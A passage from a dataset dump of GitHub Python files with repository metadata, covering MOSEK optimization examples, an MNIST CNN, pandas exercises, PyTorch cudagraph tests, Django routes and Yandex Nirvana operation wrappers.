M.variable(\"t\", 1, Domain.unbounded())\n\n # (t, vec (A-X)) \\in Q\n v = vec(Expr.sub(A, X))\n M.constraint(\"C1\", Expr.vstack(t, v), Domain.inQCone())\n\n # diag(X) = e\n M.constraint(\"C2\", X.diag(), Domain.equalsTo(1.0))\n\n # Objective: Minimize t\n M.objective(ObjectiveSense.Minimize, t)\n M.writeTask('nearcor.task')\n M.writeTask('nearcor.cbf')\n M.solve()\n\n return X.level(), t.level()\n\ndef nearestcorr_nucnorm(A, gammas):\n N = A.numRows()\n with Model(\"NucNorm\") as M:\n # Setup variables\n t = M.variable(\"t\", 1, Domain.unbounded())\n X = M.variable(\"X\", Domain.inPSDCone(N))\n w = M.variable(\"w\", N, Domain.greaterThan(0.0))\n\n # D = diag(w)\n D = Expr.mulElm(Matrix.eye(N), Var.repeat(w, 1, N))\n # (t, vec (X + D - A)) in Q\n M.constraint(Expr.vstack(t, vec(Expr.sub(Expr.add(X, D), A))),\n Domain.inQCone())\n\n result = []\n for g in gammas:\n # Objective: Minimize t + gamma*Tr(X)\n M.objective(ObjectiveSense.Minimize, Expr.add(\n t, Expr.mul(g, Expr.sum(X.diag()))))\n M.solve()\n\n # Find eigenvalues of X and compute its rank\n d = [0.0] * int(N)\n LinAlg.syeig(mosek.uplo.lo, N, X.level(), d)\n result.append(\n (g, t.level(), sum([d[i] > 1e-6 for i in range(N)]), X.level()))\n\n return result\n\nif __name__ == '__main__':\n N = 
5\n A = Matrix.dense(N, N, [0.0, 0.5, -0.1, -0.2, 0.5,\n 0.5, 1.25, -0.05, -0.1, 0.25,\n -0.1, -0.05, 0.51, 0.02, -0.05,\n -0.2, -0.1, 0.02, 0.54, -0.1,\n 0.5, 0.25, -0.05, -0.1, 1.25])\n\n gammas = [0.1 * i for i in range(11)]\n\n X, t = nearestcorr(A)\n\n print(\"--- Nearest Correlation ---\")\n print(\"X = \")\n print(X.reshape((N, N)))\n print(\"t = \", t)\n\n print(\"--- Nearest Correlation with Nuclear Norm---\")\n for g, res, rank, X in nearestcorr_nucnorm(A, gammas):\n print(\"gamma=%f, res=%e, rank=%d\" % (g, res, rank))","repo_name":"OxDuke/Bilevel-Planner","sub_path":"third_party/mosek/9.0/tools/examples/fusion/python/nearestcorr.py","file_name":"nearestcorr.py","file_ext":"py","file_size_in_byte":2880,"program_lang":"python","lang":"en","doc_type":"code","stars":31,"dataset":"github-code","pt":"72"} +{"seq_id":"70800500074","text":"# solve for x\n# X+4=9\n\ndef solve(name):\n x , add, num1, equal, num2=name.split()\n num1, num2=int(num1),int(num2)\n print(\"X = \"+str(num2-num1))\nname=input(\"enter your algebric equation \")\nname=name.strip()\nsolve(name)","repo_name":"gokuljs/python-rev","sub_path":"solv4.py","file_name":"solv4.py","file_ext":"py","file_size_in_byte":225,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"15152139669","text":"# seishin.py\r\nT, N, P = input().split()\r\nT = int(T); N = int(N); P = float(P)\r\nD = []\r\nfor i in range(N):\r\n q, x, t = input().split()\r\n q = float(q); x = int(x); t = int(t)\r\n D.append((t, x, q))\r\nD.sort()\r\n\r\ncur = 1 - P + P*sum(x*q for t, x, q in D)\r\nj = 0\r\nans = 0.\r\nres = 1.\r\nfor y in range(T):\r\n while j < N and D[j][0] <= y:\r\n t, x, q = D[j]\r\n cur += P*q*(1-x)\r\n j += 1\r\n ans += res\r\n res *= cur\r\nprint(\"%.08f\" % ans)","repo_name":"Kawser-nerd/CLCDSA","sub_path":"Source Codes/AtCoder/arc015/D/2201646.py","file_name":"2201646.py","file_ext":"py","file_size_in_byte":460,"program_lang":"python","lang":"en","doc_type":"code","stars":17,"dataset":"github-code","pt":"72"} +{"seq_id":"21837604741","text":"import random\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport tensorflow as tf\nimport pandas as pd\nimport seaborn as sns\n\nfrom keras.datasets import mnist\nfrom keras import layers\nfrom sklearn import metrics\nfrom sklearn.metrics import accuracy_score\nfrom scipy.ndimage import shift\n\n(X_train, y_train), (X_test, y_test) = mnist.load_data()\n\n\nprint(X_train.shape)\n\n\n# Method to shift the image by given dimension\n# def shift_image(image, dx, dy):\n# # image = image.reshape((28, 28))\n# shifted_image = shift(image, [dy, dx], cval=0, mode=\"constant\")\n# return shifted_image\n\n\n# X_train_augmented = [image for image in X_train]\n# y_train_augmented = [image for image in y_train]\n\n# print(\"creating augmented data source\")\n# for dx, dy in ((1, 0), (-1, 0), (0, 1), (0, -1)):\n# for image, label in zip(X_train, y_train):\n# X_train_augmented.append(shift_image(image, dx, dy))\n# y_train_augmented.append(label)\n\n\n# # Shuffle the dataset\n# shuffle_idx = np.random.permutation(len(X_train_augmented))\n# X_train = np.array(X_train_augmented)[shuffle_idx]\n# y_train = np.array(y_train_augmented)[shuffle_idx]\n\n# Check how many examples do we have in our train and test sets\nprint(\n f\"We have {len(X_train)} images in the training set and {len(X_test)} images in the test set.\"\n)\n\n# See the shape of the first sample of our training set\nprint(X_train[0].shape)\n\n# Plot the first image in our 
dataset\nplt.imshow(X_train[0])\nplt.show()\n\n# Plot in grayscale with no axes\nplt.figure(figsize=(3, 3))\nplt.imshow(X_train[0], cmap=\"gray\")\nplt.title(y_train[0])\nplt.axis(False)\nplt.show()\n\n# Plot a random image\nrandom_image = random.randint(0, len(X_train) - 1)  # randint is inclusive on both ends\n\nplt.figure(figsize=(3, 3))\nplt.imshow(X_train[random_image], cmap=\"gray\")\n\nplt.title(y_train[random_image])\nplt.axis(False)\nplt.show()\n\n# The Conv2D layer in a convolutional model requires the input to be in shape: [height, width, color_channels] but we only have the height and width dimensions so far.\n# Let's reshape our train and test data to have the missing color_channels dimension as well.\nX_train = X_train.reshape(X_train.shape + (1,))\nX_test = X_test.reshape(X_test.shape + (1,))\n\nprint(X_train.shape)  # (60000, 28, 28, 1)\n\n# Normalize our train and test images\nX_train = X_train / 255.0\nX_test = X_test / 255.0\n\n# Change the datatype of our training and test sets to float32\nX_train = X_train.astype(np.float32)\nX_test = X_test.astype(np.float32)\n\n# We’ll follow the TinyVGG architecture\n\nmodel = tf.keras.Sequential(\n    [\n        layers.Conv2D(\n            filters=10, kernel_size=3, activation=\"relu\", input_shape=(28, 28, 1)\n        ),  # Applies 10 filters to the images\n        layers.Conv2D(10, 3, activation=\"relu\"),\n        layers.MaxPool2D(),  # Downsizes the images\n        layers.Conv2D(10, 3, activation=\"relu\"),\n        layers.Conv2D(10, 3, activation=\"relu\"),\n        layers.MaxPool2D(),\n        layers.Flatten(),  # Make the output one-dimensional\n        layers.Dense(10, activation=\"softmax\"),\n    ]\n)\n\n# Check summary of model (summary() prints directly)\nmodel.summary()\n\n# Compile model\nmodel.compile(\n    loss=\"sparse_categorical_crossentropy\",\n    optimizer=tf.keras.optimizers.Adam(),\n    metrics=[\"accuracy\"],\n)\n\n# Train model or load saved model\n# model.fit(X_train, y_train, epochs=10)\nmodel.load_weights(\"./model_base\")\n\n# Check against test set\nmodel.evaluate(X_test, y_test)\n\n# Save model\n# model.save(\"model.bin\")\n\n# Predict the value of the digit on the test subset\npredicted = model.predict(X_test)\n\nprint(y_test.shape)\nprint(y_test)\n# Convert predicted weights into index of highest weight\npredicted = np.argmax(predicted, axis=1)\nprint(predicted.shape)\nprint(predicted)\n\n# Print classification report\nprint(\n    f\"Classification report for classifier {model}:\\n\"\n    f\"{metrics.classification_report(y_test, predicted)}\\n\"\n)\n\n# Plot 4 test samples and show their predicted digit value in the title.\n_, axes = plt.subplots(nrows=1, ncols=4, figsize=(10, 3))\nfor ax, image, prediction in zip(axes, X_test, predicted):\n    ax.set_axis_off()\n    ax.imshow(image.squeeze(), cmap=\"gray\", interpolation=\"nearest\")  # drop the channel dim so imshow gets (28, 28)\n    ax.set_title(f\"Prediction: {prediction}\")\n\n# accuracy\nacc = accuracy_score(y_test, predicted)\nprint(\"CNN classifier accuracy is: {:.3f}\".format(acc))\n\ndisp = metrics.ConfusionMatrixDisplay.from_predictions(y_test, predicted)\ndisp.figure_.suptitle(\"Confusion Matrix\")\nprint(f\"Confusion matrix:\\n{disp.confusion_matrix}\")\n\nplt.show()\n","repo_name":"delabroj/python-templates","sub_path":"handwritten-digits-tensorflow/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4456,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"35099407135","text":"#!/usr/bin/python3\n\"\"\"\n-- Core pandas\n---- Series methods\n------ Coding challenge\n\"\"\"\nimport datetime as dt\nimport pandas as pd\n\nday = dt.datetime(2020, 12, 
26)\nprint(day.strftime(\"%A\")) # Saturday\n\nbattles_dataframe = pd.read_csv(\"../datasets/revolutionary_war.csv\").head()\nprint(battles_dataframe)\n# Battle Start Date State\n# 0 Powder Alarm 9/1/1774 Massachusetts\n# 1 Storming of Fort William and Mary 12/14/1774 New Hampshire\n# 2 Battles of Lexington and Concord 4/19/1775 Massachusetts\n# 3 Siege of Boston 4/19/1775 Massachusetts\n# 4 Gunpowder Incident 4/20/1775 Virginia\n\n\ndays_of_war_series = pd.read_csv(\n filepath_or_buffer=\"../datasets/revolutionary_war.csv\",\n parse_dates=[\"Start Date\"],\n usecols=[\"Start Date\"]\n).squeeze(\"columns\")\n\nprint(days_of_war_series.head())\n# 0 1774-09-01\n# 1 1774-12-14\n# 2 1775-04-19\n# 3 1775-04-19\n# 4 1775-04-20\n# Name: Start Date, dtype: datetime64[ns]\n\n\ndef get_day_of_week(date):\n return date.strftime(\"%A\")\n\n\n# print(days_of_war_series.apply(get_day_of_week))\n# # ValueError: NaTType does not support strftime\n\nprint(days_of_war_series.dropna().apply(get_day_of_week))\n# 0 Thursday\n# 1 Wednesday\n# 2 Wednesday\n# 3 Wednesday\n# 4 Thursday\n# ...\n# 227 Wednesday\n# 228 Friday\n# 229 Friday\n# 230 Friday\n# 231 Wednesday\n# Name: Start Date, Length: 228, dtype: object\n\nprint(days_of_war_series.dropna().apply(get_day_of_week).value_counts())\n# Saturday 39\n# Friday 39\n# Wednesday 32\n# Thursday 31\n# Sunday 31\n# Tuesday 29\n# Monday 27\n# Name: Start Date, dtype: int64\n\n\n\n\n\n\n\n\n","repo_name":"ax-va/Pandas-Paskhaver-2021","sub_path":"examples/example-03-6-series--coding-challenge.py","file_name":"example-03-6-series--coding-challenge.py","file_ext":"py","file_size_in_byte":1749,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"14821503879","text":"# Owner(s): [\"module: cuda graphs\"]\n\nimport functools\nimport unittest\n\nimport torch\n\nimport torch._dynamo\nimport torch._dynamo.config\nimport torch._dynamo.test_case\nimport torch._dynamo.testing\nfrom torch._dynamo.testing import same\nfrom torch.testing._internal.common_utils import skipIfRocm, TEST_CUDA_GRAPH\n\n\ndef composed(*decs):\n def deco(f):\n for dec in reversed(decs):\n f = dec(f)\n return f\n\n return deco\n\n\ndef assert_aot_autograd_counter(ok=True):\n def deco(f):\n @functools.wraps(f)\n def wrap(self, *args, **kwargs):\n torch._dynamo.utils.counters.clear()\n r = f(self, *args, **kwargs)\n c_ok = torch._dynamo.utils.counters[\"aot_autograd\"][\"ok\"]\n c_not_ok = torch._dynamo.utils.counters[\"aot_autograd\"][\"not_ok\"]\n if ok:\n self.assertGreater(c_ok, 0)\n self.assertEqual(c_not_ok, 0)\n else:\n self.assertEqual(c_ok, 0)\n self.assertGreater(c_not_ok, 0)\n return r\n\n return wrap\n\n return deco\n\n\ndef patch_all(ok=True):\n return composed(\n torch._dynamo.config.patch(\n verify_correctness=True, automatic_dynamic_shapes=True\n ),\n assert_aot_autograd_counter(ok),\n )\n\n\nN_ITERS = 5\n\n\n@unittest.skipIf(not torch.cuda.is_available(), \"these tests require cuda\")\nclass TestAotCudagraphs(torch._dynamo.test_case.TestCase):\n @patch_all()\n def test_basic(self):\n def model(x, y):\n return (x + y) * y\n\n @torch._dynamo.optimize(\"cudagraphs\")\n def fn(x, y):\n for i in range(N_ITERS):\n loss = model(x, y).sum()\n loss.backward()\n\n x = torch.randn(3, device=\"cuda\", requires_grad=True)\n y = torch.randn(3, device=\"cuda\")\n fn(x, y)\n\n @patch_all()\n def test_dtoh(self):\n def model(x, y):\n a = x + y\n b = a.cpu() * 3\n return b\n\n @torch._dynamo.optimize(\"cudagraphs\")\n def fn(x, y):\n for i in 
range(N_ITERS):\n loss = model(x, y).sum()\n loss.backward()\n\n x = torch.randn(3, device=\"cuda\", requires_grad=True)\n y = torch.randn(3, device=\"cuda\")\n fn(x, y)\n\n @patch_all()\n def test_htod(self):\n def model(x, y):\n a = x + y\n return a * 3\n\n @torch._dynamo.optimize(\"cudagraphs\")\n def fn(x, y):\n for i in range(N_ITERS):\n loss = model(x, y).sum()\n loss.backward()\n\n x = torch.randn(3, device=\"cuda\", requires_grad=True)\n y = torch.randn((), device=\"cpu\")\n fn(x, y)\n\n @skipIfRocm\n def test_mutate_input(self):\n def model(x, y):\n y.add_(3)\n return x * y\n\n @torch._dynamo.optimize(\"cudagraphs\")\n def fn(x, y):\n for i in range(N_ITERS):\n with self.subTest(i):\n y_orig = y.clone()\n loss = model(x, y).sum()\n self.assertTrue(same(y, y_orig + 3))\n loss.backward()\n\n x = torch.randn(3, device=\"cuda\", requires_grad=True)\n y = torch.randn(3, device=\"cuda\")\n fn(x, y)\n\n @patch_all()\n def test_mutate_constant(self):\n def model(x, y):\n c = torch.tensor(1)\n c.add_(2)\n return x * y * 0 + c\n\n @torch._dynamo.optimize(\"cudagraphs\")\n def fn(x, y):\n for i in range(N_ITERS):\n with self.subTest(i):\n loss = model(x, y).sum()\n self.assertTrue(same(loss, torch.tensor(3.0, device=\"cuda\")))\n loss.backward()\n\n x = torch.randn(1, device=\"cuda\", requires_grad=True)\n y = torch.randn(1, device=\"cuda\")\n fn(x, y)\n\n @patch_all()\n def test_factory(self):\n def model(y):\n x = torch.zeros(3, device=\"cuda:0\")\n x.add_(3)\n return x * y\n\n @torch._dynamo.optimize(\"cudagraphs\")\n def fn(y):\n for i in range(N_ITERS):\n with self.subTest(i):\n loss = model(y).sum()\n loss.backward()\n\n y = torch.randn(3, device=\"cuda:0\", requires_grad=True)\n fn(y)\n\n @patch_all()\n def test_mutated_metadata(self):\n # more tortured example at\n # https://github.com/pytorch/pytorch/issues/81385\n def model(x):\n x = x.clone()\n x.resize_(20)\n x.fill_(2)\n return x\n\n @torch._dynamo.optimize(\"cudagraphs\")\n def fn(x):\n for i in range(N_ITERS):\n with self.subTest(i):\n rx = model(x)\n self.assertTrue(same(rx, torch.full((20,), 2.0, device=\"cuda:0\")))\n\n x = torch.empty(0, device=\"cuda:0\")\n fn(x)\n\n @patch_all()\n def test_dead_fill(self):\n def model(x):\n x = x.clone()\n y = x[0:0]\n x.fill_(2)\n y.fill_(3)\n return x, y\n\n @torch._dynamo.optimize(\"cudagraphs\")\n def fn(x):\n for i in range(N_ITERS):\n with self.subTest(i):\n rx, ry = model(x)\n self.assertTrue(same(rx, torch.full((20,), 2.0, device=\"cuda:0\")))\n self.assertTrue(same(ry, torch.empty(0, device=\"cuda:0\")))\n\n x = torch.empty(20, device=\"cuda:0\")\n fn(x)\n\n\nif __name__ == \"__main__\":\n from torch._dynamo.test_case import run_tests\n\n if not TEST_CUDA_GRAPH:\n if __name__ == \"__main__\":\n import sys\n\n sys.exit(0)\n raise unittest.SkipTest(\"cuda graph test is skipped\")\n\n run_tests()\n","repo_name":"pytorch/pytorch","sub_path":"test/dynamo/test_cudagraphs.py","file_name":"test_cudagraphs.py","file_ext":"py","file_size_in_byte":5773,"program_lang":"python","lang":"en","doc_type":"code","stars":72779,"dataset":"github-code","pt":"72"} +{"seq_id":"570241647","text":"def f_1(x):\n c=0\n f=[2,1]\n while f[-1]<=x:\n f.append(f[-1]+f[-2])\n c+=1\n return f\n\nf=f_1(1E9)\nn=int(input())\nfor i in range(n):\n v=int(input())\n if v in f:\n print(f)\n else:\n print(\"0\")","repo_name":"andresculchac/MisionTic2022.py","sub_path":"FundamentalsUNacional/Modulo 
8/SerieDeLucas.py","file_name":"SerieDeLucas.py","file_ext":"py","file_size_in_byte":203,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"9241166129","text":"from django.urls import path\nfrom . import views as store_views\n\nurlpatterns = [\n path('', store_views.home, name='home'),\n path('cart', store_views.cart, name='cart'),\n path('product/', store_views.product, name='product'),\n path('category//products', store_views.products, name='products-by-category'),\n path('cart/add/', store_views.add_cart, name='add-cart'),\n path('cart/remove/', store_views.remove_cart, name='remove-cart'),\n path('checkout', store_views.checkout, name='checkout'),\n path('success', store_views.successful_payment, name='success'),\n]\n\n# Author.objects.filter(name__contains='Terry')","repo_name":"vivekascoder/Marche","sub_path":"store/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":695,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"157657339","text":"import typing\nimport vh3\n\n\n@vh3.decorator.external_operation(\"https://nirvana.yandex-team.ru/operation/6ef6b6f1-30c4-4115-b98c-1ca323b50ac0\")\n@vh3.decorator.nirvana_names(yt_token=\"yt-token\", base_path=\"base_path\")\n@vh3.decorator.nirvana_output_names(\"outTable\")\n@vh3.decorator.nirvana_names_transformer(vh3.name_transformers.snake_to_camel)\ndef get_mr_table(\n *,\n cluster: vh3.Enum[\n typing.Literal[\n \"hahn\",\n \"banach\",\n \"freud\",\n \"marx\",\n \"hume\",\n \"arnold\",\n \"markov\",\n \"bohr\",\n \"landau\",\n \"seneca-vla\",\n \"seneca-sas\",\n \"seneca-man\",\n \"zeno\",\n ]\n ] = None,\n creation_mode: vh3.Enum[typing.Literal[\"NO_CHECK\",\n \"CHECK_EXISTS\"]] = \"NO_CHECK\",\n table: vh3.String = None,\n yt_token: vh3.Secret = None,\n file_with_table_name: vh3.Text = None,\n base_path: typing.Union[vh3.MRDirectory, vh3.MRFile, vh3.MRTable] = None\n) -> vh3.MRTable:\n \"\"\"\n Get MR Table\n\n Creates a reference to MR Table, either existing or potential.\n * If input `fileWithTableName` is present, its first line will be used as the table's path. If not, `table` option value will be used instead.\n * If `base_path` input is present, table path will be treated as *relative* and resolved against `base_path`. If not, path will be treated as *absolute*.\n\n :param cluster: Cluster:\n [[MR Cluster this table is on]]\n MR Cluster name, recognized by MR processor and FML processor.\n * If not set, `base_path`'s cluster will be used\n * If both `cluster` option value and `base_path` input are present, cluster name specified in **option** will be used\n :param creation_mode: Creation Mode:\n [[Actions to take when getting the MR Table]]\n MR Path creation mode. Specifies additional actions to be taken when getting the path\n :param table: Table:\n [[Path to MR Table]]\n Path to MR table. Used when `fileWithTableName` input is absent.\n * If `base_path` input is absent, this is an absolute path.\n * If `base_path` input is present, this is a relative path.\n :param yt_token: YT Token:\n [[(Optional) Token used if Creation Mode is \"Check that Path Exists\".\n Write the name of Nirvana Secret holding your YT Access Token here.]]\n *(Optional)* YT OAuth Token to use in \"Check that Path Exists\" Creation Mode. 
If not specified, MR Processor's token will be used.\n\n [Obtain access token](https://nda.ya.ru/3RSzVU), then [create a Nirvana secret](https://nda.ya.ru/3RSzWZ) and [use it here](https://nda.ya.ru/3RSzWb).\n You can [share the secret](https://nda.ya.ru/3RSzWd) with user(s) and/or a staff group.\n :param file_with_table_name:\n Text file with MR table path on its first line. If this input is absent, `table` option value will be used instead.\n * If `base_path` input is absent, this is an absolute path.\n * If `base_path` input is present, this is a relative path.\n :param base_path:\n Base path to resolve against.\n\n If absent, table path is considered absolute.\n \"\"\"\n raise NotImplementedError(\"Write your local execution stub here\")\n\n\n@vh3.decorator.external_operation(\"https://nirvana.yandex-team.ru/operation/84de6480-2091-47e4-b6f7-3aa5bfbae472\")\n@vh3.decorator.nirvana_names(bundle_tar_gz=\"bundle.tar.gz\")\n@vh3.decorator.nirvana_output_names(\"dst\")\n@vh3.decorator.nirvana_names_transformer(vh3.name_transformers.snake_to_dash, options=True)\ndef antifraud_runner(\n *,\n yt_token: vh3.Secret,\n mr_account: vh3.String,\n bundle_tar_gz: vh3.Binary,\n src: vh3.MRTable,\n job_layer: vh3.MultipleStrings = (\n \"01d15282-fecf-4c29-8771-1daeb410eeee\", \"c0996254-74bf-4d43-a0f6-d1e453f70c19\"),\n max_ram: vh3.Integer = 512,\n mr_default_cluster: vh3.Enum[\n typing.Literal[\n \"hahn\",\n \"freud\",\n \"marx\",\n \"hume\",\n \"arnold\",\n \"markov\",\n \"bohr\",\n \"landau\",\n \"seneca-vla\",\n \"seneca-sas\",\n \"seneca-man\",\n ]\n ] = \"arnold\"\n) -> vh3.MRTable:\n \"\"\"\n antifraud runner\n\n :param bundle_tar_gz:\n :param job_layer:\n :param mr_account: MR Account:\n [[MR Account Name.\n By default, output tables and directories will be created in some subdirectory of home///nirvana]]\n MR account name (e.g. 
`rank_machine`) used to build MR output path for this operation.\n\n See the `mr-output-path` option for more information\n :param mr_default_cluster: Default YT cluster:\n [[Default YT cluster]]\n \"\"\"\n raise NotImplementedError(\"Write your local execution stub here\")\n\n\nclass Yql1Output(typing.NamedTuple):\n output1: vh3.OptionalOutput[vh3.MRTable]\n directory: vh3.OptionalOutput[vh3.MRDirectory]\n\n\n@vh3.decorator.external_operation(\"https://nirvana.yandex-team.ru/operation/6356092e-a511-49d2-9dc5-7ea81adcde9c\")\n@vh3.decorator.nirvana_names(\n py_code=\"py_code\",\n py_export=\"py_export\",\n py_version=\"py_version\",\n use_account_tmp=\"use_account_tmp\",\n code_revision=\"code_revision\",\n code_work_dir=\"code_work_dir\",\n arcanum_token=\"arcanum_token\",\n svn_user_name=\"svn_user_name\",\n svn_user_id_rsa=\"svn_user_id_rsa\",\n svn_operation_source=\"svn_operation_source\",\n yql_server=\"yql_server\",\n)\n@vh3.decorator.nirvana_names_transformer(vh3.name_transformers.snake_to_dash, options=True)\ndef yql_1(\n *,\n mr_account: vh3.String,\n yt_token: vh3.Secret,\n yql_token: vh3.Secret,\n request: vh3.String = \"INSERT INTO {{output1}} SELECT * FROM {{input1}};\",\n py_code: vh3.String = None,\n py_export: vh3.MultipleStrings = (),\n py_version: vh3.Enum[typing.Literal[\"Python2\",\n \"ArcPython2\", \"Python3\"]] = \"Python3\",\n mr_default_cluster: vh3.Enum[\n typing.Literal[\n \"hahn\",\n \"freud\",\n \"marx\",\n \"hume\",\n \"arnold\",\n \"markov\",\n \"bohr\",\n \"landau\",\n \"seneca-vla\",\n \"seneca-sas\",\n \"seneca-man\",\n ]\n ] = \"hahn\",\n yt_pool: vh3.String = None,\n ttl: vh3.Integer = 7200,\n max_ram: vh3.Integer = 256,\n max_disk: vh3.Integer = 1024,\n timestamp: vh3.String = None,\n param: vh3.MultipleStrings = (),\n mr_output_path: vh3.String = None,\n yt_owners: vh3.String = None,\n use_account_tmp: vh3.Boolean = False,\n code_revision: vh3.String = None,\n code_work_dir: vh3.String = None,\n arcanum_token: vh3.Secret = None,\n svn_user_name: vh3.String = None,\n svn_user_id_rsa: vh3.Secret = None,\n svn_operation_source: vh3.MultipleStrings = (),\n yql_operation_title: vh3.String = \"YQL Nirvana Operation: {{nirvana_operation_url}}\",\n yql_server: vh3.String = \"yql.yandex.net\",\n mr_output_ttl: vh3.Integer = None,\n retries_on_job_failure: vh3.Integer = 0,\n retries_on_system_failure: vh3.Integer = 10,\n job_metric_tag: vh3.String = None,\n mr_transaction_policy: vh3.Enum[typing.Literal[\"MANUAL\", \"AUTO\"]] = \"AUTO\",\n input1: typing.Sequence[vh3.MRTable] = (),\n files: typing.Sequence[\n typing.Union[\n vh3.Binary,\n vh3.Executable,\n vh3.HTML,\n vh3.Image,\n vh3.JSON,\n vh3.MRDirectory,\n vh3.MRTable,\n vh3.TSV,\n vh3.Text,\n vh3.XML,\n ]\n ] = ()\n) -> Yql1Output:\n \"\"\"\n YQL 1\n\n Apply YQL script on MapReduce\n\n Code: https://a.yandex-team.ru/arc/trunk/arcadia/dj/nirvana/operations/yql/yql\n\n User guide: https://wiki.yandex-team.ru/nirvana-ml/ml-marines/#yql\n\n :param mr_account: MR Account:\n [[MR Account Name.\n By default, output tables and directories will be created in some subdirectory of home///nirvana]]\n MR account name (e.g. 
`rank_machine`) used to build MR output path for this operation.\n\n See the `mr-output-path` option for more information\n :param yt_token: YT Token:\n [[ID of Nirvana Secret with YT access token (https://nda.ya.ru/3RSzVU).\n Guide to Nirvana Secrets: https://nda.ya.ru/3RSzWZ]]\n YT OAuth Token.\n\n [Obtain access token](https://nda.ya.ru/3RSzVU), then [create a Nirvana secret](https://nda.ya.ru/3RSzWZ) and [use it here](https://nda.ya.ru/3RSzWb).\n You can [share the secret](https://nda.ya.ru/3RSzWd) with user(s) and/or a staff group.\n :param yql_token: YQL Token:\n [[YQL OAuth Token, see https://wiki.yandex-team.ru/kikimr/yql/userguide/cli/#autentifikacija]]\n YQL OAuth Token, see https://wiki.yandex-team.ru/kikimr/yql/userguide/cli/#autentifikacija\n :param request: Request\n [[YQL request]]\n YQL request\n :param py_code: Python Code\n [[Python user defined functions definition]]\n Python user defined functions definition\n :param py_export: Python Export\n [[Python user defined functions declaration]]\n Python user defined functions declaration\n :param py_version: Python Version\n [[Python user defined functions version, https://clubs.at.yandex-team.ru/yql/2400]]\n Python user defined functions version, https://clubs.at.yandex-team.ru/yql/2400\n :param mr_default_cluster: Default YT cluster:\n [[Default YT cluster]]\n Default YT cluster\n :param yt_pool: YT Pool:\n [[Pool used by YT scheduler. Leave blank to use default pool.\n This option has no effect on YaMR.]]\n Pool used by [YT operation scheduler](https://nda.ya.ru/3Rk4af). Leave this blank to use default pool.\n :param timestamp: Timestamp for caching\n [[Any string used for Nirvana caching only]]\n Any string used for Nirvana caching only\n :param param: Parameters\n [[List of 'name=value' items which could be accessed as {{param[name]}}]]\n List of 'name=value' items which could be accessed as {{param[name]}}\n :param mr_output_path: MR Output Path:\n [[Directory for output MR tables and directories.\n Limited templating is supported: `${param[\"...\"]}`, `${meta[\"...\"]}`, `${mr_input[\"...\"]}` (path to input MR *directory*) and `${uniq}` (= unique path-friendly string).]]\n Directory for output MR tables and directories.\n\n Limited templating is supported: `${param[\"...\"]}`, `${meta[\"...\"]}`, `${mr_input[\"...\"]}` (path to input MR *directory*) and `${uniq}` (= unique path-friendly string).\n\n The default template for `mr-output-path` is\n\n home[#if param[\"mr-account\"] != meta.owner]/${param[\"mr-account\"]}[/#if]/${meta.owner}/nirvana/${meta.operation_uid}\n\n If output path does not exist, it will be created.\n\n Temporary directory, `${mr_tmp}`, is derived from output path in an unspecified way. It is ensured that:\n * It will exist before `job-command` is started\n * It need not be removed manually after execution ends. 
However, you **should** remove all temporary data created in `${mr_tmp}`, even if your command fails\n :param yt_owners: YT Owners\n [[Additional YT users allowed to read and manage operations]]\n Additional YT users allowed to read and manage operations\n :param use_account_tmp: Use tmp in account\n [[Use tmp folder in account but not in //tmp for avoid fails due to tmp overquota, recommended for production processes]]\n Use tmp folder in account but not in //tmp for avoid fails due to tmp overquota, recommended for production processes\n :param code_revision: Code default revision\n [[Default code revision for {{arcadia:/...}}]]\n Default code revision for {{arcadia:/...}}\n :param code_work_dir: Code default directory\n [[Default code working directory for {{./...}}]]\n Default code working directory for {{./...}}\n :param arcanum_token: Arcanum Token\n [[Arcanum Token, see https://wiki.yandex-team.ru/arcanum/api/]]\n Arcanum Token, see https://wiki.yandex-team.ru/arcanum/api/\n :param svn_user_name: SVN User name\n [[SVN user name for operation source and {{arcadia:/...}}]]\n SVN user name for operation source and {{arcadia:/...}}\n :param svn_user_id_rsa: SVN User private key\n [[SVN user private key for operation source and {{arcadia:/...}}]]\n SVN user private key for operation source and {{arcadia:/...}}\n :param svn_operation_source: SVN Operation source\n [[The YQL operation source path on SVN, should start with arcadia:/ or svn+ssh://, may contain @revision]]\n The YQL operation source path on SVN, should start with arcadia:/ or svn+ssh://, may contain @revision\n :param yql_operation_title: YQL Operation title\n [[YQL operation title for monitoring]]\n YQL operation title for monitoring\n :param yql_server: YQL server\n [[YQL server]]\n YQL server (default: yql.yandex.net)\n :param mr_output_ttl: MR Output TTL, days:\n [[TTL in days for mr-output-path directory and outputs which are inside the directory]]\n TTL in days for mr-output-path directory and outputs which are inside the directory\n :param job_metric_tag: Job metric tag\n [[Tag for monitoring of resource usage]]\n Tag for monitoring of resource usage\n :param mr_transaction_policy: MR Transaction policy\n [[Transaction policy, in auto policy yql operations are canceled when nirvana workflow in canceled]]\n Transaction policy, in auto policy yql operations are canceled when nirvana workflow in canceled\n :param input1:\n Input 1\n :param files:\n Attached files: if link_name is specified it is interpreted as file name, otherwise the input is unpacked as tar archive\n \"\"\"\n raise NotImplementedError(\"Write your local execution stub here\")\n\n\n@vh3.decorator.external_operation(\"https://nirvana.yandex-team.ru/operation/7b6e03f0-c942-4911-b276-bc81d705c59b\")\n@vh3.decorator.nirvana_names(timestamp=\"Timestamp\", sync=\"Sync\")\n@vh3.decorator.nirvana_output_names(\"YA_PACKAGE\")\ndef ya_package(\n *,\n packages: vh3.String = None,\n package_type: vh3.Enum[typing.Literal[\"tarball\", \"debian\"]] = \"tarball\",\n use_new_format: vh3.Boolean = False,\n strip_binaries: vh3.Boolean = False,\n resource_type: vh3.String = \"YA_PACKAGE\",\n arcadia_patch: vh3.String = None,\n use_aapi_fuse: vh3.Boolean = True,\n use_arc_instead_of_aapi: vh3.Boolean = False,\n aapi_fallback: vh3.Boolean = False,\n run_tests: vh3.Boolean = False,\n checkout: vh3.Boolean = False,\n use_ya_dev: vh3.Boolean = False,\n sandbox_oauth_token: vh3.Secret = None,\n arcadia_url: vh3.String = \"arcadia:/arc/trunk/arcadia\",\n 